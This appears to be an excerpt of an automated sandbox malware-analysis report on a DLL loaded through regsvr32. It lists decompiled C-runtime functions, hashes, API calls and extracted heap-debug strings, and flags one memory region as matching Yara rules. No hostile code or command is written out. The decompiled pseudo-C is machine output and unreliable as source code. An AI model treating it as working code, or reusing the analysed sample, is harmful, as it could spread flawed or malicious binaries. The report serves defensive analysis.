                                                                                        • API ID: ExitProcess$AllocateHeap__crt
                                                                                        • String ID:
                                                                                        • API String ID: 4215626177-0
                                                                                        • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                        • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                                                                        • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                        • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                                                        
                                                                                        				_a48 = __rax;
                                                                                        				if (_a48 == 0) goto 0xf9d243ad;
                                                                                        				goto 0xf9d243f5;
                                                                                        				if (_a88 != 0) goto 0xf9d243ce;
                                                                                        				if (_a120 == 0) goto 0xf9d243c7;
                                                                                        				 *_a120 = 0xc;
                                                                                        				goto 0xf9d243f5;
                                                                                        				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
                                                                                        				if (_a120 == 0) goto 0xf9d243ef;
                                                                                        				 *_a120 = 0xc;
                                                                                        				goto 0xf9d243f5;
                                                                                        				goto 0xf9d24377;
                                                                                        				return 0;
                                                                                        			}



                                                                                        0x7fef9d24399
                                                                                        0x7fef9d243a4
                                                                                        0x7fef9d243ab
                                                                                        0x7fef9d243b2
                                                                                        0x7fef9d243ba
                                                                                        0x7fef9d243c1
                                                                                        0x7fef9d243cc
                                                                                        0x7fef9d243da
                                                                                        0x7fef9d243e2
                                                                                        0x7fef9d243e9
                                                                                        0x7fef9d243f1
                                                                                        0x7fef9d243f3
                                                                                        0x7fef9d243f9

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                        • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                                                                        • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                        • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _ioterm
                                                                                        • String ID:
                                                                                        • API String ID: 4163092671-0
                                                                                        • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                                                        • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                                                                        • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                                                        • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                                                                          • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                                                                          • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                                                          • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                                                          • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                                                        • String ID:
                                                                                        • API String ID: 1508997487-0
                                                                                        • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                                                        • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                                                                        • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                                                        • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyHeap
                                                                                        • String ID:
                                                                                        • API String ID: 2435110975-0
                                                                                        • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                        • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                                                                        • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                        • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                        • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                                                                        • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                        • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                                                                        • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                                                        • API String ID: 4197005980-4190456261
                                                                                        • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                        • Instruction ID: 631fc2af3d1e2e358681470289229c30ebeab24735d73449bcceef6109dc099e
                                                                                        • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                        • Instruction Fuzzy Hash: 6B421031A0CA8685EBB0CB14E8547EE73E4F784345FA04226D6CD43AA9DF7EE549CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                        • API String ID: 2256938910-232180764
                                                                                        • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                        • Instruction ID: c20bf9db26653c31616cb8f8a39641649b62d884e8934e9a70f617ae2971618d
                                                                                        • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                        • Instruction Fuzzy Hash: 9A81C631A19B8686E7A09B19FC4436EB3E0F784755F608135DACE426B8DF7EE448CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                                                                        • API String ID: 0-1181733849
                                                                                        • Opcode ID: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                                                        • Instruction ID: c027552587c484905274aa3c7dfc2130a2bba284c4db387798f357193d3a2f5b
                                                                                        • Opcode Fuzzy Hash: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                                                        • Instruction Fuzzy Hash: B3421035A0DB8685EBA08B69E88076E77E0F785794F214136DADD83BB4DB7ED440CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                                                                        • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                                                                        • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                                                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                                                                        • Client hook free failure., xrefs: 000007FEF9D254A0
                                                                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                                                                        • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                                                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                                                                        • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                                                                        • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapPointerValid_free_base
                                                                                        • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                                                        • API String ID: 1656799702-182684663
                                                                                        • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                        • Instruction ID: 30c4da0a101ad128366c20b2541b857d1a248eb6f856515bedc9f5e1dcd2840f
                                                                                        • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                        • Instruction Fuzzy Hash: 58C16E36A18B4586EBA48B59E88076EB7E0F785790F614536EACD43BB4DB7ED401CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                                                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                                                        • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                                                                        • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                                                        • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                                                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                                                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                                                                        • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                                                                        • DAMAGED, xrefs: 000007FEF9D25E7D
                                                                                        • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                                                                        • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                                                        • _1, xrefs: 000007FEF9D261FC
                                                                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                                                        • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                                                                        • API String ID: 0-510578482
                                                                                        • Opcode ID: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                                                        • Instruction ID: 2e3929c610d79aeb9f6375ea398ef70322b77c1420209f8d6f9956d4446a531d
                                                                                        • Opcode Fuzzy Hash: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                                                        • Instruction Fuzzy Hash: A6E13F36A18B5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: E$#r5|$30.1.3$:B)$:F&$Jq-.$K$K$Y]$kJ$kJ$sg
                                                                                        • API String ID: 0-553264730
                                                                                        • Opcode ID: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                                                        • Instruction ID: 9c682bca3309bc02ed949a6de7aa3bb6d22b0761abc13177b84899e0b503d48e
                                                                                        • Opcode Fuzzy Hash: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                                                        • Instruction Fuzzy Hash: 73E2E4715047CC8BDBB9DFA4C8897DD3BA1FB44344F10861AEC4EAE250DBB45A89CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 57%
                                                                                        			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                                                                        				void* _t7;
                                                                                        				void* _t10;
                                                                                        				signed long long _t15;
                                                                                        				signed long long* _t16;
                                                                                        				signed long long _t20;
                                                                                        				signed long long _t24;
                                                                                        
                                                                                        				_t7 = __rcx -  *0xf9d4b018; // 0x6ebcb970bf84
                                                                                        				if (_t7 != 0) goto 0xf9d2329a;
                                                                                        				asm("dec eax");
                                                                                        				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
                                                                                        				asm("repe ret");
                                                                                        				asm("dec eax");
                                                                                        				goto 0xf9d23720;
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("o16 nop [eax+eax]");
                                                                                        				if (__r8 - 8 < 0) goto 0xf9d2330c;
                                                                                        				_t20 = __rdx * 0x1010101;
                                                                                        				_t10 = __r8 - 0x40;
                                                                                        				if (_t10 < 0) goto 0xf9d232ee;
                                                                                        				_t15 =  ~__rcx;
                                                                                        				if (_t10 == 0) goto 0xf9d232de;
                                                                                        				 *__rcx = _t20;
                                                                                        				_t16 = _t15 + __rcx;
                                                                                        				if (_t10 != 0) goto 0xf9d23327;
                                                                                        				_t24 = __r8 - _t15 & 7;
                                                                                        				if (_t10 == 0) goto 0xf9d2330c;
                                                                                        				 *_t16 = _t20;
                                                                                        				if (_t10 != 0) goto 0xf9d23300;
                                                                                        				if (_t24 == 0) goto 0xf9d2331b;
                                                                                        				_t16[1] = __edx & 0x000000ff;
                                                                                        				if (_t24 - 1 != 0) goto 0xf9d23311;
                                                                                        				return __eax;
                                                                                        			}









                                                                                        0x7fef9d23280
                                                                                        0x7fef9d23287
                                                                                        0x7fef9d23289
                                                                                        0x7fef9d23292
                                                                                        0x7fef9d23294
                                                                                        0x7fef9d23296
                                                                                        0x7fef9d2329a
                                                                                        0x7fef9d2329f
                                                                                        0x7fef9d232a0
                                                                                        0x7fef9d232a1
                                                                                        0x7fef9d232a2
                                                                                        0x7fef9d232a3
                                                                                        0x7fef9d232a4
                                                                                        0x7fef9d232a5
                                                                                        0x7fef9d232a6
                                                                                        0x7fef9d232b7
                                                                                        0x7fef9d232c6
                                                                                        0x7fef9d232ca
                                                                                        0x7fef9d232ce
                                                                                        0x7fef9d232d0
                                                                                        0x7fef9d232d6
                                                                                        0x7fef9d232db
                                                                                        0x7fef9d232de
                                                                                        0x7fef9d232ec
                                                                                        0x7fef9d232f1
                                                                                        0x7fef9d232f9
                                                                                        0x7fef9d23300
                                                                                        0x7fef9d2330a
                                                                                        0x7fef9d2330f
                                                                                        0x7fef9d23311
                                                                                        0x7fef9d23319
                                                                                        0x7fef9d2331b

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3778485334-0
                                                                                        • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                        • Instruction ID: 807cfb07a33e429e3d371e20a7d7f9b872ed56a9d2d7ce20ec260cf370a1508c
                                                                                        • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
